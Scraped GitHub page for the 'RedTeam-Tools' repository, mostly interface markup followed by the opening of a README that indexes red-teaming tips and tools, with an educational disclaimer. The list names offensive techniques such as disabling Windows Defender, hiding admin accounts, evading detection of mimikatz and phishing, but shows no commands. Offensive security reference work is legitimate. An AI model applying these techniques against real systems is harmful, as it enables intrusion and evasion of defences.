1.75v4c0 .372-.116.717-.314 1 .198.283.314.628.314 1v4a1.75 1.75 0 0 1-1.75 1.75H1.75A1.75 1.75 0 0 1 0 12.75v-4c0-.358.109-.707.314-1a1.739 1.739 0 0 1-.314-1v-4C0 1.784.784 1 1.75 1ZM1.5 2.75v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm.25 5.75a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25ZM7 4.75A.75.75 0 0 1 7.75 4h4.5a.75.75 0 0 1 0 1.5h-4.5A.75.75 0 0 1 7 4.75ZM7.75 
10h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM3 4.75A.75.75 0 0 1 3.75 4h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 4.75ZM3.75 10h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="globe-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-globe"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM5.78 8.75a9.64 9.64 0 0 0 1.363 4.177c.255.426.542.832.857 1.215.245-.296.551-.705.857-1.215A9.64 9.64 0 0 0 10.22 8.75Zm4.44-1.5a9.64 9.64 0 0 0-1.363-4.177c-.307-.51-.612-.919-.857-1.215a9.927 9.927 0 0 0-.857 1.215A9.64 9.64 0 0 0 5.78 7.25Zm-5.944 1.5H1.543a6.507 6.507 0 0 0 4.666 5.5c-.123-.181-.24-.365-.352-.552-.715-1.192-1.437-2.874-1.581-4.948Zm-2.733-1.5h2.733c.144-2.074.866-3.756 1.58-4.948.12-.197.237-.381.353-.552a6.507 6.507 0 0 0-4.666 5.5Zm10.181 1.5c-.144 2.074-.866 3.756-1.58 4.948-.12.197-.237.381-.353.552a6.507 6.507 0 0 0 4.666-5.5Zm2.733-1.5a6.507 6.507 0 0 0-4.666-5.5c.123.181.24.365.353.552.714 1.192 1.436 2.874 1.58 4.948Z"></path> </svg> </template> <template id="issue-opened-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </template> <template id="device-mobile-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile"> <path d="M3.75 0h8.5C13.216 0 14 .784 14 1.75v12.5A1.75 1.75 0 0 1 12.25 16h-8.5A1.75 1.75 0 0 1 2 14.25V1.75C2 .784 2.784 0 3.75 0ZM3.5 1.75v12.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path> </svg> </template> <template id="package-icon"> <svg aria-hidden="true" 
height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-package"> <path d="m8.878.392 5.25 3.045c.54.314.872.89.872 1.514v6.098a1.75 1.75 0 0 1-.872 1.514l-5.25 3.045a1.75 1.75 0 0 1-1.756 0l-5.25-3.045A1.75 1.75 0 0 1 1 11.049V4.951c0-.624.332-1.201.872-1.514L7.122.392a1.75 1.75 0 0 1 1.756 0ZM7.875 1.69l-4.63 2.685L8 7.133l4.755-2.758-4.63-2.685a.248.248 0 0 0-.25 0ZM2.5 5.677v5.372c0 .09.047.171.125.216l4.625 2.683V8.432Zm6.25 8.271 4.625-2.683a.25.25 0 0 0 .125-.216V5.677L8.75 8.432Z"></path> </svg> </template> <template id="credit-card-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-credit-card"> <path d="M10.75 9a.75.75 0 0 0 0 1.5h1.5a.75.75 0 0 0 0-1.5h-1.5Z"></path><path d="M0 3.75C0 2.784.784 2 1.75 2h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 14H1.75A1.75 1.75 0 0 1 0 12.25ZM14.5 6.5h-13v5.75c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25Zm0-2.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25V5h13Z"></path> </svg> </template> <template id="play-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </template> <template id="gift-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-gift"> <path d="M2 2.75A2.75 2.75 0 0 1 4.75 0c.983 0 1.873.42 2.57 1.232.268.318.497.668.68 1.042.183-.375.411-.725.68-1.044C9.376.42 10.266 0 11.25 0a2.75 2.75 0 0 1 2.45 4h.55c.966 0 1.75.784 1.75 1.75v2c0 .698-.409 1.301-1 1.582v4.918A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V9.332C.409 9.05 0 8.448 0 7.75v-2C0 4.784.784 4 1.75 
4h.55c-.192-.375-.3-.8-.3-1.25ZM7.25 9.5H2.5v4.75c0 .138.112.25.25.25h4.5Zm1.5 0v5h4.5a.25.25 0 0 0 .25-.25V9.5Zm0-4V8h5.5a.25.25 0 0 0 .25-.25v-2a.25.25 0 0 0-.25-.25Zm-7 0a.25.25 0 0 0-.25.25v2c0 .138.112.25.25.25h5.5V5.5h-5.5Zm3-4a1.25 1.25 0 0 0 0 2.5h2.309c-.233-.818-.542-1.401-.878-1.793-.43-.502-.915-.707-1.431-.707ZM8.941 4h2.309a1.25 1.25 0 0 0 0-2.5c-.516 0-1 .205-1.43.707-.337.392-.646.975-.879 1.793Z"></path> </svg> </template> <template id="code-square-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-square"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25Zm7.47 3.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L10.69 8 9.22 6.53a.75.75 0 0 1 0-1.06ZM6.78 6.53 5.31 8l1.47 1.47a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="device-desktop-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path d="M14.25 1c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 14.25 12h-3.727c.099 1.041.52 1.872 1.292 2.757A.752.752 0 0 1 11.25 16h-6.5a.75.75 0 0 1-.565-1.243c.772-.885 1.192-1.716 1.292-2.757H1.75A1.75 1.75 0 0 1 0 10.25v-7.5C0 1.784.784 1 1.75 1ZM1.75 2.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25ZM9.018 12H6.982a5.72 5.72 0 0 1-.765 2.5h3.566a5.72 5.72 0 0 1-.765-2.5Z"></path> </svg> </template> <div class="position-relative"> <ul role="listbox" class="ActionListWrap QueryBuilder-ListWrap" aria-label="Suggestions" data-action=" 
aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Issues </span> </a> </li> <li hidden="hidden" data-menu-item="i2pull-requests-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-21dc99a7-d33b-471b-b05a-d3aeea7340ef" href="/A-poc/RedTeam-Tools/pulls" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Pull requests </span> </a> </li> <li hidden="hidden" data-menu-item="i3actions-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-77a2a7e1-8bdf-4152-893a-a019ff26cd4e" href="/A-poc/RedTeam-Tools/actions" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" 
width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Actions </span> </a> </li> <li hidden="hidden" data-menu-item="i4projects-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-dd793e0d-0480-4c41-9b26-e75b0e1ae5e9" href="/A-poc/RedTeam-Tools/projects" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Projects </span> </a> </li> <li hidden="hidden" data-menu-item="i5security-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-7a1ed752-fcd3-470e-b559-4bf81da5e9af" href="/A-poc/RedTeam-Tools/security" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 
4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Security </span> </a> </li> <li hidden="hidden" data-menu-item="i6insights-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-0456c50c-35b0-4b56-ab3d-47fa801a2a59" href="/A-poc/RedTeam-Tools/pulse" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Insights </span> </a> </li> </ul> </div></action-list> </div> </div></anchored-position> </focus-group> </action-menu></div> </nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <h1 class='sr-only'>A-poc/RedTeam-Tools</h1> <div class="clearfix container-xl px-md-4 px-lg-5 px-3"> <div> <div style="max-width: 
100%" data-view-component="true" class="Layout Layout--flowRow-until-md react-repos-overview-margin Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-main"> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-17c672-34345cb18aac.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_paths_index_ts-e019c54eb886.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-7496afc3784d.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-7094d4-15017f02e61c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-5f1d09-1ee828c2d6e8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repos-overview-d245eae13daf.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" 
href="https://github.githubassets.com/assets/primer-react.423a6445b565d6511bd7.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repos-overview.0ee7cac3ab511a65d9f9.module.css" /> <react-partial partial-name="repos-overview" data-ssr="true" data-attempted-ssr="true" > <script type="application/json" data-target="react-partial.embeddedData">{"props":{"initialPayload":{"allShortcutsEnabled":false,"path":"/","repo":{"id":538444958,"defaultBranch":"main","name":"RedTeam-Tools","ownerLogin":"A-poc","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2022-09-19T10:20:29.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/100603074?v=4","public":true,"private":false,"isOrgOwned":false},"currentUser":null,"refInfo":{"name":"main","listCacheKey":"v0:1663582829.975821","canEdit":false,"refType":"branch","currentOid":"73c080931ef98664485ea143de7db8d265985a32"},"tree":{"items":[{"name":"README.md","path":"README.md","contentType":"file"},{"name":"backlog","path":"backlog","contentType":"file"}],"templateDirectorySuggestionUrl":null,"readme":null,"totalCount":2,"showBranchInfobar":false},"fileTree":null,"fileTreeProcessingTime":null,"foldersToFetch":[],"treeExpanded":false,"symbolsExpanded":false,"isOverview":true,"overview":{"banners":{"shouldRecommendReadme":false,"isPersonalRepo":false,"showUseActionBanner":false,"actionSlug":null,"actionId":null,"showProtectBranchBanner":false,"publishBannersInfo":{"dismissActionNoticePath":"/settings/dismiss-notice/publish_action_from_repo","releasePath":"/A-poc/RedTeam-Tools/releases/new?marketplace=true","showPublishActionBanner":false},"interactionLimitBanner":null,"showInvitationBanner":false,"inviterName":null,"actionsMigrationBannerInfo":{"releaseTags":[],"showImmutableActionsMigrationBanner":false,"initialMigrationStatus":null}},"codeButton":{"contactPath":"/contact","isEnterprise":false,"local":{"protocolInfo":{"httpAvailable":true,"sshA
vailable":null,"httpUrl":"https://github.com/A-poc/RedTeam-Tools.git","showCloneWarning":null,"sshUrl":null,"sshCertificatesRequired":null,"sshCertificatesAvailable":null,"ghCliUrl":"gh repo clone A-poc/RedTeam-Tools","defaultProtocol":"http","newSshKeyUrl":"/settings/ssh/new","setProtocolPath":"/users/set_protocol"},"platformInfo":{"cloneUrl":"https://desktop.github.com","showVisualStudioCloneButton":false,"visualStudioCloneUrl":"https://windows.github.com","showXcodeCloneButton":false,"xcodeCloneUrl":"xcode://clone?repo=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools","zipballUrl":"/A-poc/RedTeam-Tools/archive/refs/heads/main.zip"}},"newCodespacePath":"/codespaces/new?hide_repo_select=true\u0026repo=538444958"},"popovers":{"rename":null,"renamedParentRepo":null},"commitCount":"197","overviewFiles":[{"displayName":"README.md","repoName":"RedTeam-Tools","refName":"main","path":"README.md","preferredFileType":"readme","tabName":"README","richText":"\u003carticle class=\"markdown-body entry-content container-lg\" itemprop=\"text\"\u003e\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eRedTeam-Tools\u003c/h1\u003e\u003ca id=\"user-content-redteam-tools\" class=\"anchor\" aria-label=\"Permalink: RedTeam-Tools\" href=\"#redteam-tools\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp align=\"center\" dir=\"auto\"\u003e\n\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis github repository contains a collection of \u003cstrong\u003e150+\u003c/strong\u003e \u003cstrong\u003etools\u003c/strong\u003e and \u003cstrong\u003eresources\u003c/strong\u003e that can be useful for \u003cstrong\u003ered teaming activities\u003c/strong\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e🔗 If you are a Blue Teamer, check out \u003ca href=\"https://github.com/A-poc/BlueTeam-Tools\"\u003eBlueTeam-Tools\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eWarning\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eThe materials in this repository are for informational and educational purposes only. 
They are not intended for use in any illegal activities.\u003c/em\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eHide Tool List headings with the arrow.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eClick 🔙 to get back to the list.\u003c/em\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eTool List\u003c/h1\u003e\u003ca id=\"user-content-tool-list\" class=\"anchor\" aria-label=\"Permalink: Tool List\" href=\"#tool-list\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eRed Team Tips\u003c/b\u003e 19 tips\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003eImproved HTML smuggling with mouse move eventlistener\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @pr0xylife\u003c/i\u003e\u003c/li\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#google-translate-for-phishing\"\u003eGoogle translate for 
phishing\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hiding-the-local-admin-account\"\u003eHiding the local admin account\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cripple-windows-defender-by-deleting-signatures\"\u003eCripple windows defender by deleting signatures\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enable-multiple-rdp-sessions-per-user\"\u003eEnable multiple RDP sessions per user\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sysinternals-psexecexe-local-alternative\"\u003eSysinternals PsExec.exe local alternative\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#live-off-the-land-port-scanner\"\u003eLive off the land port scanner\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#proxy-aware-powershell-downloadstring\"\u003eProxy aware PowerShell DownloadString\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003eLooking for internal endpoints in browser bookmarks\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#query-dns-records-for-enumeration\"\u003eQuery DNS records for enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#unquoted-service-paths-without-powerup\"\u003eUnquoted service paths without PowerUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n 
\u003cli\u003e\u003cb\u003e\u003ca href=\"#bypass-a-disabled-command-prompt-with-k\"\u003eBypass a disabled command prompt with /k\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Martin Sohn Christensen\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003eStop windows defender deleting mimikatz.exe\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-if-you-are-in-a-virtual-machine\"\u003eCheck if you are in a virtual machine\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @dmcxblue\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enumerate-applocker-rules\"\u003eEnumerate AppLocker rules\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003eCMD shortcut with 6 pixels via mspaint\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PenTestPartners\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003eLink spoofing with PreventDefault JavaScript method\u003c/a\u003e\u003c/b\u003e\u003ci\u003e \u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-smb-firewall-rules-with-responder\"\u003eCheck SMB firewall rules with Responder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#disable-av-with-sysinternals-pssuspend\"\u003eDisable AV with SysInternals PsSuspend\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @0gtweet\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e \n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eReconnaissance\u003c/b\u003e 24 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca 
